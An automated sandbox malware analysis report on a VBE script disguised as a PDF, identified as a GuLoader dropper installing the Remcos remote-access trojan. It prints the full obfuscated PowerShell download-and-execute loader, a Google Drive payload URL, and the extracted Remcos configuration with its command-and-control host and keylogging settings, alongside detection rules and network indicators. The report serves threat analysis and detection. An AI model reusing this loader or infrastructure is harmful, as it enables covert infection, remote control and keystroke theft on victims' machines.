Windows Analysis Report
LSMU CITATA LT 20-11-2024#U00b7pdf.vbe

Overview

General Information

Sample name: LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
renamed because original name is a hash value
Original sample name: LSMU CITATA LT 20-11-2024pdf.vbe
Analysis ID: 1559542
MD5: df045c185b46e8c2432ea266b0671f86
SHA1: db27134d7be95240a1349bbcd1a1dcfa0dfb3506
SHA256: 27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181
Tags: vbe, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7280 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Subnutritious Uninstructedness snigvejen Sortilegi #><#Diectasis Rodfunktioner Brdristens Sangerne #>$Bortfaldenes='Obskniteters';function Allemandes($Erhvervsgeografien){If ($host.DebuggerEnabled) {$nickelodeons=4} for ($Thimotheuss=$nickelodeons;;$Thimotheuss+=5){if(!$Erhvervsgeografien[$Thimotheuss]) { break }$Adgangskortenes55+=$Erhvervsgeografien[$Thimotheuss]}$Adgangskortenes55}function Xylotomies207($Sablende){ .($Douser) ($Sablende)}$Samandura=Allemandes 'BeteN TjeE inttRace. DelWSteneJustb FutCBacklTheoIRensEKagenRecat';$Trolls=Allemandes 'KonsMDrivo lluzHvlbipicklReprl J.naTold/';$Tereu=Allemandes 'NonaTGo.ilBegosEpid1 Opk2';$Tapeline=' Kat[ GuendelmeProit pro. UkoSAnakeMon.r.eacvla,gI R.fC SumeCorypCromo erIKjo nTopftSicum umoaForsN oraSoftgAeaceAffiRSpy ]endi:Liga: ,veSRevleYeascMareUBundrSvrniRoulTTi byin oP w nRLumboLaocT Foro zencToplOc rvLBars= Fer$OvartdiveE ReirB neEDen U';$Trolls+=Allemandes ' Tub5Firb.Sing0Rger Ngle(E,shWSel iBrs.n Li,dAfproGraywWronsOpsv H,ksN.ranTB dm Tyr 1Afko0Nonf.Unsp0Char; Kab nkuWB skiThu nLose6U su4Elec;svin Theox nom6Alge4,ice;U,ve n.nrKa.evAwfu:Spur1E.vi3H pe1F sh.Metr0 Enc)afna BegaG Greeel zcPrenkGrapoDekl/Mine2Aris0Semi1.ini0tvan0 Ano1Fr n0 Sol1alb, inF einiGrnsrSlove,verfPr voImbrxVisu/,ide1Alla3F,is1 He .,rem0';$Floristernes=Allemandes ' BreUPulssGuide PasrEnso-jestA Br GCus ENo tnMrkeT';$Infinitively=Allemandes 'NonmhArmvtBekrtSpanp uersWa e:Akry/Soc./ vrdd otr .uciTranv SereStag.SatrgHjeroableoCensg LaplExcieinte.vandcPoetoSu fm Ska/H teupr mc rk?Overe enxDecapruntoMararbro tKnob=tabudSe ioPropwOstenBar.llustoRivea Re dOrga& Geni haedDith=.lot1 rekzheadiMeloYStkyxC unCKummjDe.kUDescv.egij No.9Acra9TranQEna tVa.mXKolaQiracjPostBPianjTereAFacex BihM B osRegne AdemU saosysi3CondELondXBill9adonDvapu8Stanj';$Chroococcoid=Allemandes 'Malp>';$Douser=Allemandes 
'GirgILrebEPegbx';$Jakey='Risting';$Undepreciatory='\Malodourously.dar';Xylotomies207 (Allemandes 'Glue$BeclgAfbll TesoVrisb InqA lazlNomi:AtroB.eetrI quI .ubsthinKffes=Feb,$Jus eElixNWoohVSvam:OppuA UnppRan pNo,mdHa vA Ma t s nAAnti+Af.a$LedeuS erNN veDDokuEAtomP BanrV,teEDadacHjruI AnbA,hilt nnooDoseRRe lY');Xylotomies207 (Allemandes 'Abat$AdelGM isLSuppo TarBFag,aC smL .es:HusmoNoduM Ti sIu iaaarst BistCannECell=E.en$ GavICallnOverfSkumIOverNLapiIUdb,tR ndisabbvweire An.lMissYKobl. U ssSlipPPa,iLRastI S mT ice( S,o$ egicDa kHGasmrUnsioOp,uORe,lC TurO.patcCoadCKar.o BorI ,ukDlde )');Xylotomies207 (Allemandes $Tapeline);$Infinitively=$Omsatte[0];$Unpositively=(Allemandes ' Del$Eu,aGU koLVa eONiccb Kn AHiplLB yg:HaarwSupeiT.mmECathNSl eERetiRNumibA teRTanddKompsCavasqua TD,loNReprG PlueLysnrcandNJrg e Gei=ImpeNDu dEtit WS en-RaadoVanrb Lo jOmdmEV ndCBrieT ykn Tecssel YRg.osfalsT BonEDe,lM Afs.Auke$UnchSPoliATorfM tudASandNPam D Flau FelRLaurA');Xylotomies207 ($Unpositively);Xylotomies207 (Allemandes ' T,e$BoucW periTelle m.gnOvere Albr VokbNab,r PyrdBri,sR.sssDi,ctglasn Parg FloeDelgrIntenSigteAand.Rec,H FoneAbigaKagedForteDebarl onsalte[Arch$MisdF E,tl PodoCa.hr F uiDfrnsLa gtI aqeSva r,nddnUndeeRainsK.ss]Bu.e=Selv$ eadT .ocrRea oUrinlSp il .urs');$Udfladnings=Allemandes 'Poly$ A,aW Pa iSvireBenenJeereQuinrSharbOpisr TildCigasAm asVaretDeprnBeswgAb resikkr Lemn LauePhia.mi,iDfermotek.wT ken Huml orao LivaPresdSorbFHystiUdvelk tee for(Spid$O ivI LiznNonsfSolii UndnStifiSautt RosiBesvvRadreS yrlKonfyReve,Uno.$DgnaARubrnLa dd HoceNua nJennpBurmrD,sim U oiProte amps nww)';$Andenprmies=$Brisk;Xylotomies207 (Allemandes 'Un.i$ de GTubol ltroDeacbAll aNiobLEpit: C rKUti,l.aadOses VThilnBrugNZym UOpglm etrM CroEWin R Mus= sa.(Ne tTT nkEOmgjSHestTOutt-Tro,PextraudslTSkriHFlit N,ds$Essea UraNStudDTimbe MesNGhosPHei,rBalkM,onpIAmmeESkjoSUniv)');while (!$Klovnnummer) {Xylotomies207 (Allemandes 'Borg$.urrgHum lpuncoGe ebOvera Eb,lHead:Par,C PeroShamxJordc 
ArioUg.lmBrusb,efor.hapiCyaneKry s aan=c as$M,leBTyp o ErlsPhr tEn,etA,jee R,ar') ;Xylotomies207 $Udfladnings;Xylotomies207 (Allemandes 'PsycsNonet RepAPerorSeptTf,el-NedfSDizelBeneeLoneePetrPTwea Bri 4');Xylotomies207 (Allemandes ' Rib$C isgUnd.L BlrOd.febTsadaVitaL Ra.:EmbrkSekulRombO ensvChicNdeponMiddu.verm He m NauEKa pRWarn=skra(p peT eskEFruss TriTH rm- mazpMisuA U sTConthRepr b.n$FagoaRecoNUnf dBredE ygenPivopIm.rRBa emUnbeIBereeD,masUd,r)') ;Xylotomies207 (Allemandes ' Fl,$Dilag Gral coOYohibTa laOutplRipo: Ca SwoulPF ruROdden EngG,funHT ykoSkewv nkeeKommd Fl eEpidrDecon.rteech rsUrmi=prel$reapgArbeLNonsO K obMissAHjemL Ndv:Dolio otiFk,gefBankSOvercIr.eRFor EBogseBambNP ri+ Flu+ Jus%Mack$NienoForuMGyngSCeduALkkeTTermtAnmeeinsp. Pr C CysO T pUG arnMokkT') ;$Infinitively=$Omsatte[$Sprnghovedernes]}$Thimotheussndsamles=315155;$Desmolase=29732;Xylotomies207 (Allemandes 'Prom$VgtiGAistLIn.eoTinhbraisAUdsklAl e: Fu sRecuLCarcEDre UhomotTessHB stHStruO La UObarN forD Pri Ac e=Demi TilgtraweMil T Jde-Col cRik o patN Ly,t.rllEForrngadoTSt,l Unad$ SmaamarinDys,dSubeERibeNVagtpWom RTvanML,erIApanEArsmS');Xylotomies207 (Allemandes '.etr$ alig AselPlumoV sabLemmaFeudllogo: Un FUnpaodaddr Dele eoigUnhug.oillRestiAf lnKloogBegreKonfnOmv sM.re Nic=Graf O t[ CruSMusiyTrubsDisrtSymbeSolbmExci.OverCAreooBul nConsvBegie tavrAnkot ind]Komp: Hea:GlaiFSayerdimhoHogrm emiBInflaFlu s fore Sam6Spru4 An,SratitTremrFortiBerenJackgD,sl(Ta u$MollSRazzl.ilje Hylu Re t FrshMarehSalboUdflu Monnear,dAfsk)');Xylotomies207 (Allemandes 'Sk n$HoldgAccrLur eO Synbma ta VanL Ti,: onUSt nNefteSPol e Fl CGa srspriEOverTDispE resDBy,n Tra=S ri Hnde[VeinSSnegYMuffS Pe TDiseeSen MP ot.Ov,rtSti E AflXHom T s,r.Reb e,ysiN RotcK,mpORebaDVoldi Fo.NImplgPelo]J.rd:T et:ImdeaBeaaSRubecLan iBarfiBab,. 
islG uneETi nT,oreSMundTBai RIn eiPo,eNRe lGTele(Attr$blanfMis oHatcRTaoieBlyrGSim,GOve l ,eaiEnednSugngR voENonsNAshiSRequ)');Xylotomies207 (Allemandes ' Spi$f lsG ,mplUn ooTropBHalvAKalkLOlie:FusuEZilcU punrOverOOmklp PvtAAfhnmSvibEEnlaSNysgTVo.aEPascRSixpe Pren CocsCons=Land$ Appu losNGrafSnybeeSpi.c SpdRFrste Rolt bacEH mmdMeth. F,rs RenuBlodBSep SBarnTB nirKoleiParanBa dGDark(Iden$SubfTCrumhpleuIPlanMSaddOK.nsTfla.HGasteMetauR soSActaSMininS roD RetS SnkABodsmT.kslinteEUnd SEu,r,dolo$ObliD UfoeVagtsSly mxeraoDeneL Amia Acas rseeReor)');Xylotomies207 $Europamesterens;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[same obfuscated script argument as PID 7364 above]" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8020 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6304 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["gnsuw4-nsh6-mnsg.duckdns.org:3613:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8OIXMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
00000005.00000002.2558798710.0000000008C10000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.2543351346.0000000005D89000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000005.00000002.2559922258.000000000A849000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000002.00000002.2415519775.00000298AFCC4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security

Source | Rule | Description | Author | Strings
amsi64_7364.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7364.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xfd45:$b2: ::FromBase64String(
              • 0xd0c9:$s1: -join
              • 0x6875:$s4: +=
              • 0x6937:$s4: +=
              • 0xab5e:$s4: +=
              • 0xcc7b:$s4: +=
              • 0xcf65:$s4: +=
              • 0xd0ab:$s4: +=
              • 0xf44e:$s4: +=
              • 0xf4ce:$s4: +=
              • 0xf594:$s4: +=
              • 0xf614:$s4: +=
              • 0xf7ea:$s4: +=
              • 0xf86e:$s4: +=
              • 0xd8db:$e4: Get-WmiObject
              • 0xdaca:$e4: Get-Process
              • 0xdb22:$e4: Start-Process
amsi32_7808.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xa8d2:$b2: ::FromBase64String(
              • 0x9961:$s1: -join
              • 0x310d:$s4: +=
              • 0x31cf:$s4: +=
              • 0x73f6:$s4: +=
              • 0x9513:$s4: +=
              • 0x97fd:$s4: +=
              • 0x9943:$s4: +=
              • 0x136ce:$s4: +=
              • 0x1374e:$s4: +=
              • 0x13814:$s4: +=
              • 0x13894:$s4: +=
              • 0x13a6a:$s4: +=
              • 0x13aee:$s4: +=
              • 0xa173:$e4: Get-WmiObject
              • 0xa362:$e4: Get-Process
              • 0xa3ba:$e4: Start-Process
              • 0x14334:$e4: Get-Process

              System Summary

              Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: L, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", ProcessId: 7280, ProcessName: wscript.exe
              Source: Network Connection, Author: frack113, Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8020, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49799
              Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", CommandLine|base64offset|contains: L, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe", ProcessId: 7280, ProcessName: wscript.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[same obfuscated script as in the process tree above; the report truncates this field]"
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-11-20T16:53:24.730471+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49723 | 172.217.19.174 | 443 | TCP
              2024-11-20T16:53:56.419547+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49799 | 172.217.19.174 | 443 | TCP

              AV Detection

              Source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": ["gnsuw4-nsh6-mnsg.duckdns.org:3613:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8OIXMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Yara match, File source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.3% probability
              Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49729 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49805 version: TLS 1.2
              Source: Binary string: stem.Core.pdb's source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2150718779.000001D40D721000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154799674.000001D40B882000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2154578700.000001D40B882000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.000000000790D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2423263275.00000298B848E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ystem.pdbb source: powershell.exe, 00000002.00000002.2421753181.00000298B8208000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2550293525.0000000007859000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Malware configuration extractor, URLs: gnsuw4-nsh6-mnsg.duckdns.org
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1 | Host: drive.google.com
              Source: global traffic, HTTP traffic detected: GET /download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download HTTP/1.1 | Host: drive.usercontent.google.com | Connection: Keep-Alive
              Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49799 -> 172.217.19.174:443
              Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 172.217.19.174:443
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Connection: Keep-Alive
              Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
              Source: global traffic, HTTP traffic detected: GET /download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49805 version: TLS 1.2

              E-Banking Fraud

              Source: Yara matchFile source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: amsi64_7364.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7808.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C4CD022_2_00007FF848C4CD02
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C4BF562_2_00007FF848C4BF56
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6263
              Source: unknownProcess created: Commandline size = 6263
              Source: amsi64_7364.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7808.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7808, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBE@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Malodourously.dar
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-8OIXMO
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yafzq4zp.f55.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7364
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7808
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LSMU CITATA LT 20-11-2024#U00b7pdf.vbe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
